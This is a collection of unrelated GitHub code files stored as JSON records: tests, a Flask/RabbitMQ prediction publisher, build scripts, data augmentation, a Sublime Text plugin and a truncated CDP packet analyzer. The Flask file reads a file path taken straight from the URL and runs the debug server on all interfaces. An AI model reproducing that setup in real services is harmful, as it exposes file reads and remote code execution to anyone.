tp.apply_dlb(\"my default\", LoadingBlockTypesForTesting.LOADING_BLOCK_FOR_TESTING)\n        self.assertEqual(apply_1, \"my default\")\n        apply_2 = tp.apply_dlb(\"other default\", LoadingBlockTypesForTesting.OTHER_LOADING_BLOCK_FOR_TESTING)\n        self.assertEqual(apply_2, \"other default\")\n\n        # test that DLP is properly set for dataset\n        tp.set_dlp(DataLoadingPlan().deserialize(*dlp.serialize()))\n        apply_1 = list(tp.apply_dlb(\"my default\", LoadingBlockTypesForTesting.LOADING_BLOCK_FOR_TESTING))\n        self.assertEqual(apply_1, ['data'])\n        apply_2 = list(tp.apply_dlb(\"other default\", LoadingBlockTypesForTesting.OTHER_LOADING_BLOCK_FOR_TESTING))\n        self.assertEqual(apply_2, ['different-data']) \n\n        # test DLP was properly cleared\n        tp.clear_dlp()\n        apply_1 = tp.apply_dlb(\"my default\", LoadingBlockTypesForTesting.LOADING_BLOCK_FOR_TESTING)\n        self.assertEqual(apply_1, \"my default\")\n        apply_2 = tp.apply_dlb(\"other default\", LoadingBlockTypesForTesting.OTHER_LOADING_BLOCK_FOR_TESTING)\n        self.assertEqual(apply_2, \"other default\")\n        \n        # try to set an object that is not of DataLoadingPlan type\n        with self.assertRaises(FedbiomedDataLoadingPlanValueError):\n            tp.set_dlp(dict())\n        \n        tp.clear_dlp()\n        self.patcher_infer_dataset.start()\n        with self.assertRaises(FedbiomedDataLoadingPlanValueError):\n            tp.set_dlp(DataLoadingPlan().deserialize(*dlp.serialize()))\n        self.patcher_infer_dataset.stop()\n\n    def test_data_loading_plan_04_apply(self):\n        \"\"\"Tests application of a DataLoadingPlan's DataLoadingBlock\"\"\"\n        class MyDataset(DataLoadingPlanMixin):\n            def __init__(self):\n                super(MyDataset, self).__init__()\n\n            def test_mapper(self):\n                orig_key = 'orig-key'\n                return self.apply_dlb(orig_key, LoadingBlockTypesForTesting.TESTING_MAPPER, orig_key)\n\n            @staticmethod\n            def get_dataset_type():\n                return DatasetTypes.TEST\n\n        dlb = MapperBlock()\n        dlb.map = {'orig-key': 'new-key'}\n        dlp = DataLoadingPlan()\n        dlp[LoadingBlockTypesForTesting.TESTING_MAPPER] = dlb\n\n        tp = MyDataset()\n        self.assertEqual(tp.test_mapper(), 'orig-key')\n        tp.set_dlp(dlp)\n        self.assertEqual(tp.test_mapper(), 'new-key')\n\n        with self.assertRaises(FedbiomedDataLoadingPlanValueError):\n            tp.apply_dlb('some value', 'wrong-key-type')\n\n        # testing clearing feature\n        
tp.clear_dlp()\n        self.assertEqual(tp.test_mapper(), 'orig-key')\n\n\nif __name__ == '__main__':\n    unittest.main()\n","repo_name":"fedbiomed/fedbiomed","sub_path":"tests/test_data_loading_plan.py","file_name":"test_data_loading_plan.py","file_ext":"py","file_size_in_byte":13758,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"67"} +{"seq_id":"31247108943","text":"import pika\nimport numpy as np\nimport json\nimport uuid\nimport os\nimport logging\nfrom flask import Flask\nfrom flask_restful import Resource, Api\nlogging.getLogger('pika').setLevel(logging.INFO)\n\n\nclass Publisher:\n    def __init__(self):\n        self.setup_queue() # create a rabbitmq queue\n        if self.connection is None or self.connection.is_closed:\n            self.setup_queue()\n    \n    def setup_queue(self): \n        \n        \"\"\" create a rabbitmq connection with rpc like setup to send request \n        and receive back the response \"\"\"\n        \n        amqp_url = os.environ['AMQP_URL']\n        print('Connecting in Publisher to : ', amqp_url)\n        self.parameters = pika.URLParameters(amqp_url)\n        self.connection = pika.BlockingConnection(self.parameters)\n        self.channel = self.connection.channel()\n        result = self.channel.queue_declare(queue='', exclusive=True)\n        self.callback_queue = result.method.queue\n        self.channel.basic_consume(\n            queue=self.callback_queue,\n            on_message_callback=self.on_response,\n            auto_ack=True)    \n    \n    def publish_data_to_predictorqueue(self, data):\n        \n        \"\"\"sending data to predictor and setting up the callback queue \n        to receive back the response\"\"\"\n        \n        self.response = None\n        self.corr_id = str(uuid.uuid4())\n        self.channel.basic_publish(\n            exchange='',\n            routing_key='Predictor',\n            properties=pika.BasicProperties(\n                reply_to=self.callback_queue,\n                correlation_id=self.corr_id,\n            ),\n            body=data)\n        while self.response is None:\n            self.connection.process_data_events()\n        return float(self.response)\n\n    def on_response(self, ch, method, props, body):\n        \n        \"\"\"get response and compare the correlation id \n        to process the response\"\"\"\n        \n        if self.corr_id == props.correlation_id:\n            self.response = body\n    \n    \nclass DataSourceHandler(Resource):\n    \n    def dataDefault(self, obj):\n        \n        \"\"\" default object to process data from json \"\"\"\n        \n        if type(obj).__module__ == np.__name__:\n            if isinstance(obj, np.ndarray):\n                return obj.tolist()\n            else:\n                return obj.item()\n        raise TypeError('Unknown type:', type(obj))\n    \n    def get(self, dataSource):\n        \n        \"\"\" API method to return probability data response \"\"\" \n        try:\n            print(\"Data source given : \", dataSource)\n            try:\n                publisher = Publisher()\n            except:\n                result = {\"Error\" :\"There is an error in Establishing Rabbitmq connection in publisher\"}\n                return result\n            try:\n                sourceData = self.getSourceData(dataSource)\n                result = self.getResponseProbabilityData(sourceData, dataSource, publisher)\n            except:\n                result = {\"Error\" :\"There is an error in Processing data\"}\n            \n            return (json.loads(json.dumps(result)))\n        except:\n            result = {\"Error\" :\"There is an error in Publishing data\"}\n            return result\n    \n    \n    def getSourceData(self, dataSource):\n        \n        \"\"\"processing data with numpy\"\"\"\n        \n        sourceData = np.loadtxt(dataSource, delimiter=',', skiprows=1)\n        sourceData.reshape(-1, 1)\n        return sourceData\n    \n    def getResponseProbabilityData(self, sourceData, dataSource, publisher):\n        \n        \"\"\"getting predictor data result, sending one row at a time to the queue\n        assuming data file can be huge \"\"\"\n        \n        result = []\n        for row in sourceData: \n            requestData = row[1:4]\n            requestData = requestData.reshape(1, -1)\n            requestBody = json.dumps(requestData, default=self.dataDefault)\n            print(\"Sent \", requestBody, \" to Queue\")\n            response = publisher.publish_data_to_predictorqueue(requestBody)\n            print(\" Probability that the given source belongs to Class 1 : \", response)\n            result.append({'dataSource': dataSource,\n                           'inputData': requestBody, 'probability': response})\n        return result\n    \n    \napp = Flask(__name__)\napi = Api(app)\napi.add_resource(DataSourceHandler, \"/api/predict/\")\n\n \nif __name__ == '__main__':\n    app.run(host='0.0.0.0', port=80, debug=True)\n","repo_name":"snehapvs/PythonRabbitmqApp","sub_path":"publisher/PublishMessage.py","file_name":"PublishMessage.py","file_ext":"py","file_size_in_byte":4454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"22607221685","text":"import os, sys\nfrom distutils.core import setup, Extension\nfrom Cython.Build import cythonize\n\nsupport_dir = \"/Users/aloukian/Documents/fdm/pycxx\"\n\nif os.name == 'posix':\n    CXX_libraries = ['stdc++','m']\nelse:\n    CXX_libraries = []\n\nsetup(\n    name = \"FDM\", \n    version = \"0.01\", \n    maintainer = \"Anton Loukianov\", \n    maintainer_email = \"aloukian@umich.edu\", \n    description = \"Filter diagonalization module for python.\", \n    url = \"\", \n    ext_modules = [\n        Extension('_fdm',\n            define_macros= [('USE_THREAD',), ('DEBUG',), ('PYCXX_DEBUG',)],\n            undef_macros=['NDEBUG'],\n            sources = [\n                'fdm_ctx.cpp',\n                'fdm_module.cpp', \n                os.path.join(support_dir,'Src/cxxsupport.cxx'), \n                os.path.join(support_dir,'Src/cxx_extensions.cxx'), \n                os.path.join(support_dir,'Src/IndirectPythonInterface.cxx'), \n                os.path.join(support_dir,'Src/cxxextensions.c')\n                ],\n            include_dirs = [support_dir, \n                os.path.join(support_dir, '../armadillo/include'),\n                '/usr/local/Cellar/openblas/0.2.6/include',\n                '/Users/aloukian/Compile/harminv-1.3.1/',\n                ],\n            libraries = ['openblas', 'harminv'],\n            library_dirs = ['/usr/local/Cellar/openblas/0.2.6/lib'],\n            extra_compile_args = ['-O0'],\n            extra_link_args= ['-L/usr/local/Cellar/harminv/1.3.1/lib \\\n                -L/usr/local/Cellar/gfortran/4.8.1/gfortran/lib/gcc/x86_64-apple-darwin12.3.0/4.8.1 \\\n                -L/usr/local/Cellar/gfortran/4.8.1/gfortran/lib/gcc/x86_64-apple-darwin12.3.0/4.8.1/../../.. 
\\\n -lharminv -llapack -lblas -lm -lgfortran -lSystem -lgcc_ext.10.5 \\\n -lquadmath -lm'],\n )\n \n ],\n)\n","repo_name":"antonl/fdmtools","sub_path":"make.py","file_name":"make.py","file_ext":"py","file_size_in_byte":1817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"42524250608","text":"# -*- coding: utf-8 -*-\n# ------------------------------------------------------------------ import(s)\nimport sys\n\nimport collada.collada_type as co_type\n\n\n# ------------------------------------------------------------------- param(s)\n# ------------------------------------------------------------------- class(s)\n# ---------------------------------------------------------------- function(s)\n# ============================================================================\ndef load_library_materials(collada_scene, xml_node_library, logger=None):\n\n resource_ridx = 1\n\n for xml_node in xml_node_library.getElementsByTagName(\"material\"):\n attr_id = xml_node.getAttribute(\"id\")\n attr_name = xml_node.getAttribute(\"name\")\n\n o_material = co_type.CMaterial()\n o_material.attr_id = attr_id\n o_material.attr_name = attr_name\n\n if collada_scene.o_argv.MATERIAL is None:\n o_material.resource_ridx = resource_ridx\n collada_scene.dict_material[attr_id] = o_material\n\n logger.debug(\"material> id = %s, name = %s (resource_idx = %d)\", attr_id, attr_name, resource_ridx)\n\n resource_ridx += 1\n\n elif o_material.attr_id in collada_scene.o_argv.MATERIAL:\n o_material.resource_ridx = resource_ridx\n collada_scene.dict_material[attr_id] = o_material\n\n logger.debug(\"material> id = %s, name = %s (resource_idx = %d)\", attr_id, attr_name, resource_ridx)\n\n resource_ridx += 1\n\n return True\n\n\n\n# [EOF]\n","repo_name":"MizunagiKB/collada2tres","sub_path":"collada/lib_material.py","file_name":"lib_material.py","file_ext":"py","file_size_in_byte":1523,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"67"} +{"seq_id":"16716234734","text":"import os\nfrom PIL import Image\nimport numpy as np\n\n\ndef data_aug(input_path, save_path, current_scene_num):\n if not os.path.exists(save_path):\n os.makedirs(save_path)\n scene_dir = np.sort(os.listdir(input_path))\n for f in scene_dir:\n print(f)\n\n image_path = os.path.join(input_path, f, 'image')\n gt_path = os.path.join(input_path, f, 'gt')\n voxel_path = os.path.join(input_path, f, 'voxels')\n\n # 90\n current_scene_num += 1\n image_save_path_90 = os.path.join(save_path, 'scene{:04d}'.format(current_scene_num), 'image')\n gt_save_path_90 = os.path.join(save_path, 'scene{:04d}'.format(current_scene_num), 'gt')\n voxel_save_path_90 = os.path.join(save_path, 'scene{:04d}'.format(current_scene_num), 'voxels')\n\n # 180\n current_scene_num += 1\n image_save_path_180 = os.path.join(save_path, 'scene{:04d}'.format(current_scene_num), 'image')\n gt_save_path_180 = os.path.join(save_path, 'scene{:04d}'.format(current_scene_num), 'gt')\n voxel_save_path_180 = os.path.join(save_path, 'scene{:04d}'.format(current_scene_num), 'voxels')\n\n # up and down\n current_scene_num += 1\n image_save_path_ud = os.path.join(save_path, 'scene{:04d}'.format(current_scene_num), 'image')\n gt_save_path_ud = os.path.join(save_path, 'scene{:04d}'.format(current_scene_num), 'gt')\n voxel_save_path_ud = os.path.join(save_path, 'scene{:04d}'.format(current_scene_num), 'voxels')\n\n\n if not os.path.exists(image_save_path_90):\n os.makedirs(image_save_path_90)\n 
os.makedirs(gt_save_path_90)\n            os.makedirs(voxel_save_path_90)\n\n            os.makedirs(image_save_path_180)\n            os.makedirs(gt_save_path_180)\n            os.makedirs(voxel_save_path_180)\n\n            os.makedirs(image_save_path_ud)\n            os.makedirs(gt_save_path_ud)\n            os.makedirs(voxel_save_path_ud)\n\n        # loop image\n        for ff in np.sort(os.listdir(image_path)):\n            file = os.path.join(image_path, ff)\n            image = Image.open(file)\n            image_90 = image.transpose(Image.ROTATE_90)\n            image_180 = image.transpose(Image.ROTATE_180)\n            image_ud = image.transpose(Image.FLIP_TOP_BOTTOM)\n\n            # save per image\n            image_90.save(os.path.join(image_save_path_90, ff))\n            image_180.save(os.path.join(image_save_path_180, ff))\n            image_ud.save(os.path.join(image_save_path_ud, ff))\n\n        # loop gt\n        for ff in np.sort(os.listdir(gt_path)):\n            file = os.path.join(gt_path, ff)\n            gt = Image.open(file)\n            gt_90 = gt.transpose(Image.ROTATE_90)\n            gt_180 = gt.transpose(Image.ROTATE_180)\n            gt_ud = gt.transpose(Image.FLIP_TOP_BOTTOM)\n\n            # save per gt\n            gt_90.save(os.path.join(gt_save_path_90, ff))\n            gt_180.save(os.path.join(gt_save_path_180, ff))\n            gt_ud.save(os.path.join(gt_save_path_ud, ff))\n\n        # loop event\n        for ff in np.sort(os.listdir(voxel_path)):\n            file = os.path.join(voxel_path, ff)\n            event = np.load(file)\n\n            event_90 = []\n            event_180 = []\n            event_ud = []\n            # rotate/flip each temporal slice of the voxel grid\n            for i in range(event.shape[0]):\n                event_90.append(np.rot90(event[i], 1))\n                event_180.append(np.rot90(event[i], 2)) # 180 degrees counterclockwise\n                event_ud.append(np.flip(event[i], axis=0)) # flip upside down\n\n            event_90 = np.array(event_90)\n            event_180 = np.array(event_180)\n            event_ud = np.array(event_ud)\n            np.save(os.path.join(voxel_save_path_90, ff), event_90)\n            np.save(os.path.join(voxel_save_path_180, ff), event_180)\n            np.save(os.path.join(voxel_save_path_ud, ff), event_ud)\n\n\nif __name__ == '__main__':\n    input_path = '../data/dataset_voxel_0717/train_outdoor'\n    save_path = '../data/dataset_voxel_0717/aug_data'\n    init_scene_num = 744\n    data_aug(input_path, save_path, init_scene_num)\n\n    # change scene num name\n    # file = np.sort(os.listdir(input_path))\n    # for f in file:\n    #     scene_path = os.path.join(input_path, f)\n    #     num = int(scene_path[-4:]) + 300\n    #\n    #     os.rename(scene_path, input_path + '/scene{:04d}'.format(num))\n\n    print(\"process end!\")","repo_name":"diamondxx/LIE-code","sub_path":"utils/data_aug.py","file_name":"data_aug.py","file_ext":"py","file_size_in_byte":4367,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"67"} +{"seq_id":"71531713492","text":"import sys\r\nfrom PyQt5.QtWidgets import (QWidget, QToolTip, QPushButton, QApplication)\r\nfrom PyQt5.QtGui import QFont\r\n\r\nclass Example(QWidget):\r\n\tdef __init__(self):\r\n\t\tsuper().__init__()\r\n\t\tself.initUI()\r\n\r\n\tdef initUI(self):\r\n\t\tQToolTip.setFont(QFont('SansSerif',10))\r\n\t\t#This static method sets a font used to render tooltips. We use a 10px SansSerif font\r\n\r\n\t\tself.setToolTip(\"This is a QWidget widget\")\r\n\t\t#To create a tooltip, we call the setToolTip() method\r\n\t\tbtn=QPushButton('Button',self)\r\n\t\tbtn.setToolTip('This is a QPushButton widget')\r\n\t\t#We create a Push button widget and create a tooltip for it\r\n\t\tbtn.resize(btn.sizeHint())\r\n\t\tbtn.move(50,50)\r\n\t\t#The button is being resized and moved on the window. 
The sizeHint() method gives a recommended size\r\n\t\t#for the button\r\n\r\n\t\tself.setGeometry(300,300,300,200)\r\n\t\tself.setWindowTitle('Tooltips')\r\n\t\tself.show()\r\n\r\nif __name__=='__main__':\r\n\tapp=QApplication(sys.argv)\r\n\tex=Example()\r\n\tsys.exit(app.exec_())","repo_name":"dibakarbose/PyQt","sub_path":"PracticeCodes/3_tooltip.py","file_name":"3_tooltip.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"44544833419","text":"import sys\nINF = int(1e9)\nn,m = map(int, sys.stdin.readline().split())\ngraph = [[INF]*(n+1) for _ in range(n+1)]\nfor _ in range(m):\n\ta,b = map(int, sys.stdin.readline().split())\n\tgraph[a][b] = 1\n\tgraph[b][a] = 1\nx,k = map(int, sys.stdin.readline().split())\n\nfor i in range(1,n+1):\n\tfor j in range(1, n+1):\n\t\tif i==j :\n\t\t\tgraph[i][j] = 0\n\nfor l in range(1, n+1):\n\tfor i in range(1, n+1):\n\t\tfor j in range(1, n+1):\n\t\t\tgraph[i][j] = min(graph[i][j], graph[i][l] + graph[l][j])\n\nif(graph[1][k]==INF or graph[k][x]==INF):\n\tprint(-1)\nelse:\n\tprint(graph[1][k] + graph[k][x])\n'''\nTry to find shortest path from node 1 -> K -> X\nMust pass K: (Min cost of 1-> K) + (Min Cost of K->X)\nSolve with Floyd-Warshall.\n'''","repo_name":"arkdusdyk/Algorithms","sub_path":"thisiscodingtest/Shortest Path/미래도시.py","file_name":"미래도시.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"114014718","text":"import sublime\nimport sublime_plugin\n\n# helpers for changing the theme\ndef _get_path_to_scheme(scheme):\n    color_schemes = sublime.find_resources(\"*.sublime-color-scheme\")\n    for color_scheme in color_schemes:\n        if scheme in color_scheme:\n            return color_scheme\n    else:\n        raise ValueError('No scheme matching {} found'.format(scheme))\n\ndef _set_color_scheme(scheme, settings=None):\n    scheme = _get_path_to_scheme(scheme)\n    _do_set_color_scheme_tmp(scheme, settings=settings)\n\ndef _do_set_color_scheme_tmp(color_scheme_path, settings):\n    if settings is None:\n        settings = _load_settings()\n    settings.set('color_scheme', color_scheme_path)\n\ndef _load_settings():\n    return sublime.load_settings('Preferences.sublime-settings')\n\n\n\nNUM_KEYS = '0123456789'\nMOVE_KEYS = 'hjklwWpPeEfF'\n## elemental movement\n# h - move left\n# j - move down\n# k - move up\n# l - move right\n\n## regions\n# p - partial word - next non [a-zA-Z0-9]\n# w - word - next white space\n# e - end - end of line\n# f - file - end of file\n\n## less defined regions\n# t - til - next \n# u - until - next inclusive\n# h - here - select word under cursor\n# H - here - select sub word under cursor\n# c - contained - bounded by - handles brackets (){}<>\n# C - Contained - bounded by inclusive\n\n# Note: caps invert unless otherwise specified\n\nclass VimpovAction(object):\n    current_action = None\n    last_action = None\n    def __init__(self, repeat=None, verb=None, adjective=None, noun=None):\n        self.repeat = repeat\n        self.verb = verb\n        self.adjective = adjective\n        self.noun = noun\n        self.record = []\n\n    def process_key(self, key):\n        self.record.append(key)\n        if not self.has_repeat() and not self.has_verb():\n            if not self.maybe_process_repeat(key):\n                self.process_verb(key)\n        elif self.has_repeat() and not self.has_verb():\n            if not self.maybe_process_repeat(key):\n                self.process_verb(key)\n        elif self.has_verb() and not self.has_adjective():\n            self.process_adjective(key)\n        elif 
self.has_adjective():\n self.process_noun(key)\n else:\n raise ValueError('We should not be here')\n return self.fully_formed()\n\n def maybe_process_repeat(self, key):\n print('maybe_process_repeat', key)\n if key not in NUM_KEYS:\n return False\n if self.repeat is None:\n self.repeat = [key]\n else:\n self.repeat += [key]\n return True\n\n def process_verb(self, key):\n print('process_verb', key)\n # g - go\n # d - delete\n # s - select\n if key in 'gds':\n self.verb = key\n elif key in MOVE_KEYS:\n self.verb = 'g'\n self.noun = key\n self.adjective = key\n else:\n raise ValueError('{} is not a valid verb'.format(key))\n\n def process_adjective(self, key):\n print('process_adjective', key)\n # TODO maybe steal from https://github.com/philippotto/Sublime-MultiEditUtils/blob/master/MultiEditUtils.py\n if key in MOVE_KEYS:#'sSwWlLfFhH':\n self.adjective = key\n self.noun = key\n elif key in 'tTuUhHcC':\n self.adjective = key\n elif key in 'd': # delete selection\n self.adjective = key\n self.noun = key\n else:\n raise ValueError('Cannot use {} as an adjective'.format(key))\n\n def process_noun(self, key):\n print('process_noun', key)\n self.noun = key\n\n def has_repeat(self):\n return self.repeat is not None\n\n def has_verb(self):\n return self.verb is not None\n\n def has_adjective(self):\n return self.adjective is not None\n\n def has_noun(self):\n return self.noun is not None\n\n def fully_formed(self):\n return self.has_verb() and self.has_noun() and self.has_adjective()\n\n def __repr__(self):\n return '{} {} {}'.format(self.verb if self.verb else '', self.adjective if self.adjective else '', self.noun if self.noun else '')\n\n def __str__(self):\n return self.__repr__()\n\n\ndef do_toggle_vimprov(view):\n settings = view.settings()\n vimprov = not settings.get('vimprov', False)\n settings.set('vimprov', vimprov)\n settings.set('command_mode', vimprov)\n VimpovAction.current_action = VimpovAction()\n VimpovAction.last_action = None\n view.set_status('_vimprov', '')\n\n if vimprov:\n stark_color_theme_loc = settings.get('vimprov_stark_them')\n if stark_color_theme_loc is None:\n stark_color_theme_loc = _get_path_to_scheme('Stark')\n settings.set('vimprov_stark_them', stark_color_theme_loc)\n\n prev_theme = settings.get('color_scheme')\n\n print(prev_theme, '~>', stark_color_theme_loc)\n\n settings.set('vimprov_prev_theme', prev_theme)\n\n _do_set_color_scheme_tmp(stark_color_theme_loc, settings)\n\n else:\n stark_color_theme_loc = settings.get('vimprov_stark_them')\n assert stark_color_theme_loc is not None\n\n prev_theme = settings.get('vimprov_prev_theme')\n assert prev_theme is not None\n\n print(stark_color_theme_loc, '~>', prev_theme)\n\n _do_set_color_scheme_tmp(prev_theme, settings)\n\n\ndef do_move(key, view, extend):\n assert key in MOVE_KEYS\n # elemental\n if key == 'h':\n view.run_command('move', {'by': 'characters', 'forward': False, 'extend': extend})\n elif key == 'j':\n view.run_command('move', {'by': 'lines', 'forward': True, 'extend': extend})\n elif key == 'k':\n view.run_command('move', {'by': 'lines', 'forward': False, 'extend': extend})\n elif key == 'l':\n view.run_command('move', {'by': 'characters', 'forward': True, 'extend': extend})\n # regions\n elif key == 'w':\n view.run_command('move', {'by': 'words', 'forward': True, 'extend': extend})\n elif key == 'W':\n view.run_command('move', {'by': 'words', 'forward': False, 'extend': extend})\n elif key == 'p':\n view.run_command('move', {'by': 'subwords', 'forward': True, 'extend': extend})\n elif key == 'P':\n 
view.run_command('move', {'by': 'subwords', 'forward': False, 'extend': extend})\n elif key == 'e':\n view.run_command('move_to', {'to': 'eol', 'extend': extend})\n elif key == 'E':\n view.run_command('move_to', {'to': 'bol', 'extend': extend})\n elif key == 'f':\n view.run_command('move_to', {'to': 'eof', 'extend': extend})\n elif key == 'F':\n view.run_command('move_to', {'to': 'bof', 'extend': extend})\n\n\ndef do_move_in_the_weeds(view, til, forward, extend, include_char, erase=False, edit=None):\n new_regions = []\n for sel in view.sel():\n # set side of selection based on direction\n if forward:\n row, col = view.rowcol(sel.b)\n else:\n row, col = view.rowcol(sel.a)\n # do find\n line = view.substr(view.line(view.text_point(row, 0)))\n left = line[:col]\n right = line[col:]\n if forward:\n delta = right.find(til)\n row, col = view.rowcol(sel.b)\n else:\n delta = left.rfind(til)\n delta = len(left) - delta\n row, col = view.rowcol(sel.a)\n # ensure that delta is positive\n delta = max(delta, 0)\n\n if delta == -1 or delta == 0: # handle no movement\n if extend:\n region = sublime.Region(sel.a, sel.b)\n else:\n region = sublime.Region(sel.a, sel.a)\n else: # handle movement\n if include_char and forward: # off-by-ones with include chat\n delta += 1\n if not include_char and not forward:\n delta -= 1\n\n # ensure that selection stays on line\n if forward:\n moved_row, _ = view.rowcol(sel.b+delta)\n else:\n moved_row, _ = view.rowcol(sel.a-delta)\n\n if moved_row != row:\n delta = 0\n\n # move selection\n if extend:\n if forward:\n region = sublime.Region(sel.a, sel.b+delta)\n else:\n region = sublime.Region(sel.a-delta, sel.b)\n else:\n if forward:\n region = sublime.Region(sel.a+delta, sel.a+delta)\n else:\n region = sublime.Region(sel.a-delta, sel.a-delta)\n new_regions.append(region)\n\n # clear and recreate selections\n view.sel().clear()\n for region in new_regions:\n view.sel().add(region)\n if erase:\n assert edit is not None\n delete_nonempty_selections(view, edit)\n\ndef delete_nonempty_selections(view, edit):\n for sel in view.sel():\n if not sel.empty():\n view.erase(edit, sublime.Region(sel.a, sel.b))\n\ndef transform_action(action, view, edit):\n print('transform_action', action.verb, action.adjective, action.noun)\n if action.verb == 'i':\n do_toggle_vimprov(view)\n\n def doit():\n assert action.verb in 'gsd'\n extend = action.verb in 'sd'\n forward = action.adjective in 'tu'\n include_char = action.adjective in 'tC'\n erase = action.verb == 'd'\n if action.verb == 'd' and action.adjective == 'd':\n delete_nonempty_selections(view, edit)\n\n if action.adjective in MOVE_KEYS:\n do_move(action.adjective, view, extend=extend)\n if erase:\n delete_nonempty_selections(view, edit)\n\n elif action.adjective in 'tT':\n do_move_in_the_weeds(view=view, til=action.noun, forward=forward, extend=extend, include_char=include_char, edit=edit, erase=erase)\n elif action.adjective in 'uU':\n do_move_in_the_weeds(view=view, til=action.noun, forward=forward, extend=extend, include_char=include_char, edit=edit, erase=erase)\n elif action.adjective in 'cC':\n if not extend:\n print('contained implies extend')\n if action.noun in '()':\n left_char = '('\n right_char = ')'\n elif action.noun in '<>':\n left_char = '<'\n right_char = '>'\n elif action.noun in '[]':\n left_char = '['\n right_char = ']'\n elif action.noun in '{}':\n left_char = '{'\n right_char = '}'\n else:\n left_char = right_char = action.noun\n\n do_move_in_the_weeds(view=view, til=right_char, forward=True, extend=True, 
include_char=include_char, edit=edit, erase=erase)\n do_move_in_the_weeds(view=view, til=left_char, forward=False, extend=True, include_char=include_char, edit=edit, erase=erase)\n else:\n print('{} is not a valid adjective'.format(action.adjective))\n\n if action.repeat is None:\n repeat = 1\n else:\n repeat = int(''.join(action.repeat))\n\n for _ in range(repeat):\n doit()\n\nimport re\n\n\ndef do_regex_forward_search(view, regex):\n new_regions = []\n for sel in view.sel():\n # set side of selection based on direction\n row, col = view.rowcol(sel.b)\n\n # do find\n line = view.substr(view.line(view.text_point(row, 0)))\n right = line[col:]\n # print(regex, right)\n match = re.search(regex, right)\n # print(match)\n if match is not None:\n a = sel.b + match.start()\n b = sel.b + match.end()\n print(a, b)\n new_regions.append(sublime.Region(a, b))\n else:\n new_regions.append(sublime.Region(sel.a, sel.b))\n\n view.sel().clear()\n for region in new_regions:\n print('***', region)\n view.sel().add(region)\n\nclass VimprovRegexSearchCommand(sublime_plugin.TextCommand):\n def run(self, edit, regex):\n do_regex_forward_search(self.view, regex)\n\nclass ProcessVimprovArg(sublime_plugin.TextCommand):\n # def __init__(self, arg):\n # sublime_plugin.TextCommand.__init__(self, arg)\n # self.regex = None\n\n\n def do_regex_search(self, regex):\n self.view.run_command(\"vimprov_regex_search\", {\"regex\": regex})\n\n def run(self, edit, key):\n view = self.view\n print('handle key', key)\n\n # special handling for insert\n if key == 'i':\n do_toggle_vimprov(view)\n return\n # special handling for repeat\n if key == '.':\n if VimpovAction.last_action is not None:\n transform_action(VimpovAction.last_action, view, edit)\n return\n # special handling for /\n if key == '/' and not VimpovAction.current_action.has_verb():\n w = self.view.window()\n w.show_input_panel(\n ':', '',\n self.do_regex_search,\n None,\n None,\n )\n return\n # TODO\n # * clear selection for verb x\n # * dd to delete selection\n # * why doesn't undo work?\n\n # # special handling for undo\n # if key == 'u':\n # view.run_command('undo')\n # return\n # # special handling for redo\n # if key == 'U':\n # view.run_command('redo')\n # return\n\n # process regular keys\n settings = view.settings()\n view.set_status('_vimprov', '--- Vimprov: ' + ''.join(VimpovAction.current_action.record) + ' ---' )\n try:\n VimpovAction.current_action.process_key(key)\n except ValueError as e:\n print('Vimprov error:', e)\n VimpovAction.current_action = VimpovAction()\n else:\n print(VimpovAction.current_action.fully_formed())\n if VimpovAction.current_action.fully_formed():\n transform_action(VimpovAction.current_action, view, edit)\n VimpovAction.last_action = VimpovAction(\n repeat=VimpovAction.current_action.repeat,\n noun=VimpovAction.current_action.noun,\n adjective=VimpovAction.current_action.adjective,\n verb=VimpovAction.current_action.verb,\n )\n VimpovAction.current_action = VimpovAction()\n\n\nclass ToggleVimprovCommand(sublime_plugin.TextCommand):\n def run(self, edit):\n view = self.view\n do_toggle_vimprov(self.view)\n","repo_name":"TeaUponTweed/Vimprov","sub_path":"Vimprov.py","file_name":"Vimprov.py","file_ext":"py","file_size_in_byte":14481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"13579543947","text":"from django.urls import path\nfrom . 
import views\n\n\n\nurlpatterns=[\n    path('reg/',views.reg,name='reg'),\n    path('login/',views.login,name='login'),\n    path('logout/',views.logout,name='logout'),\n    path('book_room/',views.book, name=\"book_room\"),\n    path('booking_details/',views.booking_details,name=\"booking_details\"),\n\n\n\n\n]","repo_name":"Akash740/Hotel-webapp","sub_path":"account/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"16343696492","text":"import frappe\nfrom lms.lms.md import markdown_to_html\n\n\ndef execute():\n\tcourses = frappe.get_all(\"LMS Course\", fields=[\"name\", \"description\"])\n\n\tfor course in courses:\n\t\thtml = markdown_to_html(course.description)\n\t\tfrappe.db.set_value(\"LMS Course\", course.name, \"description\", html)\n\n\tfrappe.reload_doc(\"lms\", \"doctype\", \"lms_course\")\n","repo_name":"frappe/lms","sub_path":"lms/patches/v0_0/convert_course_description_to_html.py","file_name":"convert_course_description_to_html.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","stars":457,"dataset":"github-code","pt":"67"} +{"seq_id":"24742871790","text":"#!/usr/bin/env python3\n\nimport pyshark\nimport argparse\n\nparser = argparse.ArgumentParser(\n    description=\"CDP analyze\"\n)\n\nparser.add_argument(\n    '-f',\n    dest=\"FILE\",\n    type=str,\n    help=\"The infile\"\n)\n\nparser.add_argument(\n    '-v',\n    action='store_true',\n    help=\"Verbose mode. Shows all attributes\"\n)\n\nargs = parser.parse_args()\n\n\ncap = pyshark.FileCapture(args.FILE, display_filter=\"cdp\")\ni = 1\n\n\n\nif args.v:\n\n    for pkt in cap:\n        print(\"\\033[1;34m[*]\\033[0m Packet \" + str(i) + \" :\")\n        print(\"\")\n        print(pkt.cdp)\n        print(\"\")\n        print(\"\")\n        print(\"\")\n   